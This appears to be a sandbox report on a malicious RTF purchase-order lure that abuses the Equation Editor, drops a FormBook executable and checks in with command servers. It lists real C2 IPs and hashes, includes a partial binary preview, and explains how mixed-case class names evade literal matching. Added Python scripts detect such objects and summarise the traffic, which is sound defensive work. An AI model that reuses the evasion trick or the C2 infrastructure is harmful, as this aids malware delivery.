Preview: L..................F.... ......?......?...;..yj....T...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S ...user.8......QK.X.S .*...&=....U...............A.l.b.u.s.....z.1......S!...Desktop.d......QK.X.S!.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2..T..zS.. .PO-543~1.DOC..L.......S...S..*.........................P...O.-.5.4.3.3.E.R.E...d.o.c.......y...............-...8...[............?J......C:\Users\..#...................\\376483\Users.user\Desktop\P.O-5433ERE.doc.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P...O.-.5.4.3.3.E.R.E...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......376483..........D_....3N...W...9..g............[D_....3N...W...9.
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 73
Entropy (8bit): 4.773958169341782
Encrypted: false
SSDEEP: 3:bDuMJltejggLFXVomX1BzEggLFXVov:bCmeEOBVh/OBVy
MD5: 131E7683725D996AEC21A1F5847BCDE0
SHA1: D2072FE38996DC116BB8F83FAA6EB06DA12A12BC
SHA-256: 5C4CEDA284DE11D195F3FFBE973AFE37C644D83E539A0FD45D669DE21AC889E3
SHA-512: B54A862B3A415138850784C131BCB85F43BFDA6F2E39C737C18A6347450BB94F79F1C813486E42AA4316DD291A7A88C533355C1DB48117FF3B431BFE46023BF5
Malicious: false
Preview: [folders]..Templates.LNK=0..P.O-5433ERE.LNK=0..[doc]..P.O-5433ERE.LNK=0..
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 162
Entropy (8bit): 2.5038355507075254
Encrypted: false
SSDEEP: 3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
MD5: 45B1E2B14BE6C1EFC217DCE28709F72D
SHA1: 64E3E91D6557D176776A498CF0776BE3679F13C3
SHA-256: 508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
SHA-512: 2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
Malicious: false
Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 560128
Entropy (8bit): 7.648991597743519
Encrypted: false
SSDEEP: 12288:XBzcmhiTopuBWTgKY6VnDe9k2X9/KPMsh8S7P/TyjixBFmRq:XBomhisIWAIDe9HtK1h8Srbyji1Wq
MD5: D236BB1F86CAEC110ABB20FC2360E25B
SHA1: 0611498ED409D30150D2A0B2A6426E5CB9504D8A
SHA-256: 2F08F5B23A062671FBA5957B98D05A728299BB1AE98695B9B5D36E75528CCAB7
SHA-512: 4F1B645A4710291C197F25E7C7258D5D4D2F710607412228DEBA8D7A1C172FDD6D82DB2C791C6D6064E405AA577DDC1BF469D6EB8C2241A0ACB068A31F3490D1
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a..............0.................. ........@.. ....................................@....................................O.......p............................................................................ ............... ..H............text...t.... ...................... ..`.rsrc...p...........................@..@.reloc..............................@..B........................H........H...!..........dj..`4............................................s....}.....s ...}.....(!....(.....{.....o"...*.0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(*...-...........o.....*..................{....o+....{....o,...o-.....}....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(0...t......|......(...+...3.*....0..........
C:\Users\user\Desktop\~$O-5433ERE.doc
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 162
Entropy (8bit): 2.5038355507075254
Encrypted: false
SSDEEP: 3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
MD5: 45B1E2B14BE6C1EFC217DCE28709F72D
SHA1: 64E3E91D6557D176776A498CF0776BE3679F13C3
SHA-256: 508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
SHA-512: 2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
Malicious: false
Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                            Static File Info

                                                            General

                                                            File type:Rich Text Format data, unknown version
                                                            Entropy (8bit):4.45528097771043
                                                            TrID:
                                                            • Rich Text Format (5005/1) 55.56%
                                                            • Rich Text Format (4004/1) 44.44%
                                                            File name:P.O-5433ERE.doc
                                                            File size:21635
                                                            MD5:17ca06000e92058f0d43259b2683537c
                                                            SHA1:db453e5125310d209fe04fb0211677d79d25f3ee
                                                            SHA256:3c9280552a4129fdf884414b080c80d5ffc72403079d7a5292e9b09d832ab37d
                                                            SHA512:3e05cc9f7284eb7a1d6756380882b0b1b2d89ce42b887e6c28c49342a9ce61157392997f7bdd96add1fbeefe3ea2ce07c14e8b1e6b245488a2c248d0b8e51148
                                                            SSDEEP:384:ziXxa+OcfzOxCtiij+jSAF5yQZ5v8dqhS/MF0rDXjq/:mxdy4tiij+jSy/iqhf
                                                            File Content Preview:{\rtf713'=?.&=+.?24>[/^!2-|???|$?%^%*`+9,#??%86.?#<';+6|'0+%@|__'6,|.<7`_(<00=9;&.2&==?(?1>#.4-~_2?~(4/|0.,]|.(??.1?@<~'?'_|?4][&@$?#??&^@);|(]3~`_<?,`5~(`7-?>;()<^+^!,46~77]/_?#02,:?]|8|]4.^]&|?%_9%?4)3.~4?.?^&[$?;?=&%5.@.;~>;?%.4%?&;):(;+$3[?0?.3[?11./2

                                                            File Icon

                                                            Icon Hash:e4eea2aaa4b4b4a4

                                                            Static RTF Info

                                                            Objects

                                                            Id  Start      Format ID  Format    Classname   Datasize  Filename  Sourcepath  Temppath  Exploit
                                                            0   00001F62h                                                                               no
                                                            1   00001F16h  2          embedded  EqUatIon.3  1614                                        no
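
Object 1 is an embedded OLE object whose class name is written EqUatIon.3, a mixed-case spelling of the Equation Editor ProgID Equation.3. ProgIDs are resolved through the registry, which is case-insensitive, so Word still hands the object to EQNEDT32.EXE; the odd casing only defeats tooling that matches the string literally, and the static Exploit column of this table reads no for it. The Python below is an added example written for this page (it is not part of the report or of any Joe Sandbox tooling): it walks the \object groups of an RTF file, decodes the hex in each \objdata into the OLE1.0 object stream described in [MS-OLEDS], reads the FormatID, class name and native data size that the table's Format ID, Classname and Datasize columns show, and flags Equation Editor objects whatever their casing. The RTF fragment it embeds is constructed for the demonstration and is not the sample's content.

```python
import re
import struct
from dataclasses import dataclass
from typing import List, Optional, Tuple

# ProgIDs served by the legacy Equation Editor (EQNEDT32.EXE), keyed by lower-case form.
EQUATION_EDITOR_PROGIDS = {"equation.2": "Equation.2", "equation.3": "Equation.3"}
FORMAT_NAMES = {1: "linked", 2: "embedded"}            # OLE1.0 ObjectHeader.FormatID

OBJECT_RE = re.compile(rb"\\object\b")
OBJCLASS_RE = re.compile(rb"\\objclass\s*([^\\{}\s]+)")
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)")


@dataclass
class RtfObject:
    objclass: Optional[str]   # class name as written after \objclass, if the group has one
    format_id: int            # FormatID from the OLE1.0 ObjectHeader
    classname: str            # ClassName from the OLE1.0 ObjectHeader
    datasize: int             # NativeDataSize of an embedded object (0 for linked)
    equation_editor: bool     # ClassName resolves to an Equation Editor ProgID ...
    case_mangled: bool        # ... but only when compared case-insensitively


def _lp_ansi(buf: bytes, off: int) -> Tuple[str, int]:
    """LengthPrefixedAnsiString: 4-byte length (counting the NUL), then the bytes."""
    (n,) = struct.unpack_from("<I", buf, off)
    off += 4
    return buf[off:off + n].rstrip(b"\x00").decode("latin-1"), off + n


def parse_ole1_header(blob: bytes) -> Tuple[int, str, int]:
    """(FormatID, ClassName, NativeDataSize) of an OLE1.0 object stream ([MS-OLEDS] 2.2)."""
    _version, fmt = struct.unpack_from("<II", blob, 0)
    classname, off = _lp_ansi(blob, 8)
    _topic, off = _lp_ansi(blob, off)
    _item, off = _lp_ansi(blob, off)
    size = struct.unpack_from("<I", blob, off)[0] if fmt == 2 else 0
    return fmt, classname, size


def scan_rtf(data: bytes) -> List[RtfObject]:
    """One record per \\object group whose \\objdata hex decodes to an OLE1.0 stream."""
    found: List[RtfObject] = []
    starts = [m.start() for m in OBJECT_RE.finditer(data)]
    for i, start in enumerate(starts):
        end = starts[i + 1] if i + 1 < len(starts) else len(data)
        group = data[start:end]
        m_class, m_data = OBJCLASS_RE.search(group), OBJDATA_RE.search(group)
        if not m_data:
            continue
        try:
            blob = bytes.fromhex(re.sub(rb"\s+", b"", m_data.group(1)).decode("ascii"))
            fmt, classname, size = parse_ole1_header(blob)
        except (ValueError, struct.error):
            continue                       # truncated or non-hex payload: skipped here
        canonical = EQUATION_EDITOR_PROGIDS.get(classname.lower())
        found.append(RtfObject(
            objclass=m_class.group(1).decode("latin-1") if m_class else None,
            format_id=fmt, classname=classname, datasize=size,
            equation_editor=canonical is not None,
            case_mangled=canonical is not None and classname != canonical,
        ))
    return found


def suspicious_objects(objs: List[RtfObject]) -> List[RtfObject]:
    """Embedded objects that Word would hand to EQNEDT32.EXE, whatever their casing."""
    return [o for o in objs if o.equation_editor and o.format_id == 2]


# --- constructed test input (NOT the sample's bytes) ---------------------------------
def _ole1_embedded(classname: str, native: bytes) -> bytes:
    """Build an OLE1.0 EmbeddedObject stream: header, NativeDataSize, NativeData."""
    def lp(s: str) -> bytes:
        return (struct.pack("<I", len(s) + 1) + s.encode() + b"\x00") if s else struct.pack("<I", 0)
    return (struct.pack("<II", 0x00000501, 2) + lp(classname) + lp("") + lp("")
            + struct.pack("<I", len(native)) + native)


SAMPLE_RTF = (
    b"{\\rtf1 junk text "
    + b"{\\object\\objemb{\\*\\objclass EqUatIon.3}{\\*\\objdata "
    + _ole1_embedded("EqUatIon.3", b"\x1c\x00\x00\x00" + b"A" * 20).hex().encode() + b"}}"
    + b"{\\object\\objemb{\\*\\objdata "
    + _ole1_embedded("Package", b"MZ\x90\x00").hex().encode() + b"}}"
    + b"}"
)

if __name__ == "__main__":
    for o in scan_rtf(SAMPLE_RTF):
        flag = "EQUATION EDITOR, case-mangled" if o.case_mangled else ("EQUATION EDITOR" if o.equation_editor else "")
        print(f"{o.classname:<12} {FORMAT_NAMES.get(o.format_id, o.format_id):<9} {o.datasize:>6}  {flag}")
```

The check compares the OLE1 class name case-insensitively against the known Equation Editor ProgIDs and reports separately when the casing differs from the canonical spelling, so a record that is both Equation Editor and case-mangled is worth a closer look even where a static "Exploit" heuristic reports nothing. Against a real file, read it in binary and pass the bytes to scan_rtf.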

                                                            Network Behavior

                                                            Snort IDS Alerts

                                                            Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP       Dest IP
                                                            11/25/21-18:10:21.768246  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49166        80         192.168.2.22    144.91.75.9
                                                            11/25/21-18:10:21.768246  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49166        80         192.168.2.22    144.91.75.9
                                                            11/25/21-18:10:21.768246  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49166        80         192.168.2.22    144.91.75.9
                                                            11/25/21-18:10:31.987537  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49167        80         192.168.2.22    34.102.136.180
                                                            11/25/21-18:10:31.987537  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49167        80         192.168.2.22    34.102.136.180
                                                            11/25/21-18:10:31.987537  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49167        80         192.168.2.22    34.102.136.180
                                                            11/25/21-18:10:32.106174  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49167      34.102.136.180  192.168.2.22
                                                            11/25/21-18:10:37.240250  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49168        80         192.168.2.22    34.102.136.180
                                                            11/25/21-18:10:37.240250  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49168        80         192.168.2.22    34.102.136.180
                                                            11/25/21-18:10:37.240250  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49168        80         192.168.2.22    34.102.136.180
                                                            11/25/21-18:10:37.357869  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49168      34.102.136.180  192.168.2.22
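
The alert table shows the same three FormBook check-in signatures firing on each of three client connections (source ports 49166 to 49168) and a 403 Forbidden response recorded only from 34.102.136.180; the TCP Packets table of this report lists, segment by segment, the earlier connection from port 49165 to 37.0.9.166. The Python below is an added example written for this page, not part of the report or of Joe Sandbox: it turns rows of both kinds into one summary per client connection (packets in each direction, duration, alert SIDs) and lists which check-in targets were actually seen answering. As constructed input it embeds the first six packet rows and all eleven alert rows copied from this report; the 49166 to 49168 connections are represented by their alerts only, so for them "answered" rests solely on the 403 alert. Treating the lower port number as the service side is an assumption that holds for sandbox traffic, where the client always uses an ephemeral port.

```python
from dataclasses import dataclass, field
from datetime import datetime
from typing import Dict, Optional, Set, Tuple

FORMBOOK_CHECKIN_SIDS = {2031453, 2031449, 2031412}   # ET TROJAN FormBook CnC Checkin (GET)
SERVER_403_SID = 1201                                 # ATTACK-RESPONSES 403 Forbidden
CHECKIN = "ET TROJAN FormBook CnC Checkin (GET)"
FORBIDDEN = "ATTACK-RESPONSES 403 Forbidden"
C = "192.168.2.22"                                    # the sandbox client

# Constructed input: the first six rows of the report's TCP Packets table
# (timestamp, source port, dest port, source IP, dest IP) ...
PACKETS = [
    ("Nov 25, 2021 18:08:39.144543886 CET", 49165, 80, C, "37.0.9.166"),
    ("Nov 25, 2021 18:08:39.172197104 CET", 80, 49165, "37.0.9.166", C),
    ("Nov 25, 2021 18:08:39.172300100 CET", 49165, 80, C, "37.0.9.166"),
    ("Nov 25, 2021 18:08:39.172686100 CET", 49165, 80, C, "37.0.9.166"),
    ("Nov 25, 2021 18:08:39.200264931 CET", 80, 49165, "37.0.9.166", C),
    ("Nov 25, 2021 18:08:39.202337980 CET", 80, 49165, "37.0.9.166", C),
]
# ... and all eleven rows of its Snort IDS Alerts table
# (timestamp, SID, message, source port, dest port, source IP, dest IP).
ALERTS = [
    ("11/25/21-18:10:21.768246", 2031453, CHECKIN, 49166, 80, C, "144.91.75.9"),
    ("11/25/21-18:10:21.768246", 2031449, CHECKIN, 49166, 80, C, "144.91.75.9"),
    ("11/25/21-18:10:21.768246", 2031412, CHECKIN, 49166, 80, C, "144.91.75.9"),
    ("11/25/21-18:10:31.987537", 2031453, CHECKIN, 49167, 80, C, "34.102.136.180"),
    ("11/25/21-18:10:31.987537", 2031449, CHECKIN, 49167, 80, C, "34.102.136.180"),
    ("11/25/21-18:10:31.987537", 2031412, CHECKIN, 49167, 80, C, "34.102.136.180"),
    ("11/25/21-18:10:32.106174", 1201, FORBIDDEN, 80, 49167, "34.102.136.180", C),
    ("11/25/21-18:10:37.240250", 2031453, CHECKIN, 49168, 80, C, "34.102.136.180"),
    ("11/25/21-18:10:37.240250", 2031449, CHECKIN, 49168, 80, C, "34.102.136.180"),
    ("11/25/21-18:10:37.240250", 2031412, CHECKIN, 49168, 80, C, "34.102.136.180"),
    ("11/25/21-18:10:37.357869", 1201, FORBIDDEN, 80, 49168, "34.102.136.180", C),
]


@dataclass
class Flow:
    client: Tuple[str, int]
    server: Tuple[str, int]
    packets_out: int = 0                 # client -> server
    packets_in: int = 0                  # server -> client
    first: Optional[datetime] = None
    last: Optional[datetime] = None
    alert_sids: Set[int] = field(default_factory=set)

    @property
    def duration(self) -> float:
        return (self.last - self.first).total_seconds() if self.first and self.last else 0.0

    @property
    def c2_checkin(self) -> bool:
        return bool(self.alert_sids & FORMBOOK_CHECKIN_SIDS)

    @property
    def server_answered(self) -> bool:
        # A packet from the server, or Snort seeing its 403, proves the peer is alive.
        return self.packets_in > 0 or SERVER_403_SID in self.alert_sids

    def touch(self, t: datetime) -> None:
        self.first = t if self.first is None or t < self.first else self.first
        self.last = t if self.last is None or t > self.last else self.last


def parse_packet_ts(s: str) -> datetime:
    """'Nov 25, 2021 18:08:39.144543886 CET' -> naive datetime, nanoseconds truncated to microseconds."""
    body, _tz = s.rsplit(" ", 1)
    head, frac = body.rsplit(".", 1)
    return datetime.strptime(head, "%b %d, %Y %H:%M:%S").replace(microsecond=int(frac[:6].ljust(6, "0")))


def parse_alert_ts(s: str) -> datetime:
    """Snort fast-alert style '11/25/21-18:10:21.768246'."""
    return datetime.strptime(s, "%m/%d/%y-%H:%M:%S.%f")


def _endpoints(sport: int, dport: int, sip: str, dip: str) -> Tuple[Tuple[str, int], Tuple[str, int]]:
    """(client, server): assumption, the lower port is the service side."""
    if sport < dport:
        return (dip, dport), (sip, sport)
    return (sip, sport), (dip, dport)


def build_flows(packets, alerts) -> Dict[Tuple[str, int], Flow]:
    """Key every flow by its client endpoint; merge packet rows and alert rows into it."""
    flows: Dict[Tuple[str, int], Flow] = {}
    for ts, sport, dport, sip, dip in packets:
        client, server = _endpoints(sport, dport, sip, dip)
        f = flows.setdefault(client, Flow(client, server))
        if (sip, sport) == client:
            f.packets_out += 1
        else:
            f.packets_in += 1
        f.touch(parse_packet_ts(ts))
    for ts, sid, _msg, sport, dport, sip, dip in alerts:
        client, server = _endpoints(sport, dport, sip, dip)
        f = flows.setdefault(client, Flow(client, server))
        f.alert_sids.add(sid)
        f.touch(parse_alert_ts(ts))
    return flows


def c2_candidates(flows: Dict[Tuple[str, int], Flow]) -> Dict[str, bool]:
    """Server IPs that drew a FormBook check-in alert -> whether that server was seen answering."""
    out: Dict[str, bool] = {}
    for f in flows.values():
        if f.c2_checkin:
            out[f.server[0]] = out.get(f.server[0], False) or f.server_answered
    return out


if __name__ == "__main__":
    flows = build_flows(PACKETS, ALERTS)
    for f in sorted(flows.values(), key=lambda f: f.client):
        print(f"{f.client[0]}:{f.client[1]} -> {f.server[0]}:{f.server[1]}  out={f.packets_out} in={f.packets_in}"
              f"  {f.duration:.6f}s  sids={sorted(f.alert_sids)}  answered={f.server_answered}")
    print("check-in targets:", c2_candidates(flows))
```

The output separates the two things an analyst wants from these tables: which servers the implant tried to reach (every flow with a check-in SID) and which of them are live (a reply packet or a 403 alert). A 403 is still a reply; a target with no response of any kind, such as 144.91.75.9 in the alert rows, may be down, sinkholed or simply not reached within the run, and the packet list for that port is the place to settle it.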

                                                            Network Port Distribution

                                                            TCP Packets

                                                            Timestamp                            Source Port  Dest Port  Source IP     Dest IP
                                                            Nov 25, 2021 18:08:39.144543886 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.172197104 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.172300100 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.172686100 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.200264931 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.202337980 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.202358961 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.202399969 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.202477932 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.202503920 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.202521086 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.202532053 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.202568054 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.202580929 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.202594042 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.202670097 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.202718973 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.202744961 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.202792883 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.230190992 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.230221033 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.230232954 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.230246067 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.230258942 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.230289936 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.230309963 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.230319977 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.230360031 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.230364084 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.230365992 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.230367899 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.230370045 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.230371952 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.231187105 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.258021116 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.258049011 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.258079052 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.258127928 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.258153915 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.258163929 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.258173943 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.258191109 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.258203030 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.258208990 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.258234978 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.258260012 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.258315086 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.258332968 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.258369923 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.260016918 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.285830975 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.285857916 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.285871983 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.285886049 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.285936117 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.285938978 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.285959005 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.285968065 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.285974979 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.285979033 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.285998106 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.286014080 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.286031961 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.286067963 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.313581944 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.313611984 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.313626051 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.313638926 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.313668966 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.313749075 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.313786983 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.313790083 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.313792944 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.313795090 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.341367960 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.341401100 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.341444969 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.341645002 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.369299889 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.369411945 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.396967888 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.397115946 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.424694061 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.424722910 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.424876928 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.425214052 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.452599049 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.452650070 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.452728033 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.452769041 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.480346918 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.480376005 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.480406046 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.480436087 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.485872030 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.485944986 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.513463020 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.513494015 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.513536930 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.513566971 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.776051044 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.776243925 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.804050922 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.804335117 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.832047939 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.832304955 CET  49165        80         192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:39.859962940 CET  80           49165      37.0.9.166    192.168.2.22
                                                            Nov 25, 2021 18:08:39.860229969 CET  49165        80         192.168.2.22  37.0.9.166
